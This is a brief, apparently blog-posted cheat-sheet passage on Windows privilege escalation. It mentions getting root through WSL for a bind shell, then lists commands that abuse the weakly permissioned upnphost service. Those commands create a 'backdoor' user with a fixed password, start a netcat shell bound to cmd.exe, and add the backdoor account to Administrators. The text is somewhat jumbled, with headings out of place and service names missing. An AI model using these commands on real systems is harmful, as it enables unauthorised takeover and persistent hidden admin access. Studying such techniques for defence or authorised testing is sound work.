Don’t know the root password? No problem just set the default user to root W/. With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Technique borrowed from Warlockobama’s tweet $ accesschk.exe -uwcqv "Authenticated Users" * /accepteula RW SSDPSRV SERVICE_ALL_ACCESS RW upnphost SERVICE_ALL_ACCESS $ accesschk.exe -ucqv upnphost upnphost RW NT AUTHORITY\SYSTEM SERVICE_ALL_ACCESS RW BUILTIN\Administrators SERVICE_ALL_ACCESS RW NT AUTHORITY\Authenticated Users SERVICE_ALL_ACCESS RW BUILTIN\Power Users SERVICE_ALL_ACCESS $ sc config binpath = "net user backdoor backdoor123 /add" $ sc config binpath = "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe" $ sc stop $ sc start $ sc config binpath = "net localgroup Administrators backdoor /add" $ sc stop $ sc start EoP - Windows Subsystem for Linux (WSL)
0 Comments
Leave a Reply. |